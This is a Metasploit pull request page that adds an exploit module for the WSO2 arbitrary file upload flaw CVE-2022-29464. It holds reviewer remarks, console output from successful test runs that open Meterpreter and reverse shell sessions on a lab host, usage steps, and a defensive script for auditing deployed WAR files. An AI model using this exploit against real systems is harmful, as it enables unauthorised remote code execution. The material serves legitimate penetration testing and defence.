Add WSO2 file upload RCE module #16507
Hi, Jack!
WILL!! Great to hear from you, I knew it wasn't bye forever 🎉
Co-authored-by: bcoles <bcoles@gmail.com>
…it-framework into wso2-file-upload-rce
@msjenkins-r7 test this please.
Module is working great! The check method looks a lot better now and the exponential backoff means I'm getting my shells a lot faster. I tested both a Java Meterpreter and Java Shell payload. Everything worked perfectly. I'll get this landed in a moment.
Testing Output
msf6 exploit(multi/http/wso2_file_upload_rce) > show options
Module options (exploit/multi/http/wso2_file_upload_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 9443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Relative URI of WSO2 product installation
VHOST no HTTP server virtual host
WAR_DEPLOY_DELAY 20 yes How long to wait for the war file to deploy, in seconds
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java Dropper
msf6 exploit(multi/http/wso2_file_upload_rce) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(multi/http/wso2_file_upload_rce) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/wso2_file_upload_rce) > check
[*] 192.168.159.128:9443 - The target appears to be vulnerable.
msf6 exploit(multi/http/wso2_file_upload_rce) > edit
msf6 exploit(multi/http/wso2_file_upload_rce) > exploit
msf6 exploit(multi/http/wso2_file_upload_rce) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[*] Waiting for shell...
[*] Waiting for shell...
[*] Waiting for shell...
[*] Waiting for shell...
[+] Payload executed successfully
[*] Sending stage (58851 bytes) to 192.168.159.128
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.128:60720 ) at 2022-04-29 09:55:35 -0400
meterpreter > getuid
Server username: smcintyre
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 5.17.4-100.fc34.x86_64 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.159.128 - Meterpreter session 1 closed. Reason: User exit
[*] 192.168.159.128 - Meterpreter session 1 closed. Reason: Died
msf6 exploit(multi/http/wso2_file_upload_rce) > set PAYLOAD java/
set PAYLOAD java/jsp_shell_bind_tcp set PAYLOAD java/meterpreter/bind_tcp set PAYLOAD java/meterpreter/reverse_https set PAYLOAD java/shell/bind_tcp set PAYLOAD java/shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp set PAYLOAD java/meterpreter/reverse_http set PAYLOAD java/meterpreter/reverse_tcp set PAYLOAD java/shell/reverse_tcp
msf6 exploit(multi/http/wso2_file_upload_rce) > set PAYLOAD java/shell/reverse_tcp
PAYLOAD => java/shell/reverse_tcp
msf6 exploit(multi/http/wso2_file_upload_rce) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[*] Waiting for shell...
[*] Waiting for shell...
[+] Payload executed successfully
[*] Sending stage (2952 bytes) to 192.168.159.128
[*] Command shell session 2 opened (192.168.159.128:4444 -> 192.168.159.128:60722 ) at 2022-04-29 09:56:25 -0400
id
uid=1000(smcintyre) gid=1000(smcintyre) groups=1000(smcintyre),10(wheel),973(docker),975(wireshark)
pwd
/home/smcintyre/Downloads/wso2am-4.0.0
exit
[*] 192.168.159.128 - Command shell session 2 closed.
msf6 exploit(multi/http/wso2_file_upload_rce) >
Release Notes
This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.
Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a war file and uploads it to the target via the vulnerable file upload. It then executes the payload and receives a shell.
Verification
List the steps needed to make sure this thing works
use multi/http/wso2_file_upload_rce
set rhosts [ip]
set lhost [ip]
run
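Because the module described above works by getting a war file deployed on the server, a defender can audit the deployment directory against a known-good baseline. The following is an added example, not part of this pull request or of Metasploit; the `repository/deployment/server/webapps` location, the function names and the sample WAR files are assumptions constructed for illustration.

```python
import hashlib
import tempfile
import zipfile
from pathlib import Path

# Assumed webapps location under the product home; adjust per installation.
WEBAPPS_SUBDIR = Path("repository/deployment/server/webapps")
CODE_SUFFIXES = (".jsp", ".jspx", ".class", ".jar")


def sha256_of(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def audit_webapps(webapps_dir, baseline):
    """Report WAR files missing from, or differing from, {name: sha256}."""
    findings = []
    for war in sorted(Path(webapps_dir).glob("*.war")):
        expected = baseline.get(war.name)
        if expected == sha256_of(war):
            continue
        reason = "modified" if expected else "not in baseline"
        try:
            with zipfile.ZipFile(war) as zf:
                code = [n for n in zf.namelist() if n.lower().endswith(CODE_SUFFIXES)]
        except zipfile.BadZipFile:
            code, reason = [], reason + ", not a valid archive"
        findings.append({"file": war.name, "reason": reason, "code_entries": code})
    return findings


def demo():
    """Audit a constructed directory: one baselined WAR, one that appeared later."""
    with tempfile.TemporaryDirectory() as home:
        webapps = Path(home) / WEBAPPS_SUBDIR
        webapps.mkdir(parents=True)
        with zipfile.ZipFile(webapps / "known-app.war", "w") as zf:
            zf.writestr("WEB-INF/web.xml", "<web-app/>")
        baseline = {"known-app.war": sha256_of(webapps / "known-app.war")}
        with zipfile.ZipFile(webapps / "unexpected.war", "w") as zf:  # constructed
            zf.writestr("WEB-INF/web.xml", "<web-app/>")
            zf.writestr("index.jsp", "<%-- placeholder --%>")
        return audit_webapps(webapps, baseline)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The baseline should be recorded from a clean installation and stored off the host, since anything able to write to the webapps directory could also rewrite a local baseline.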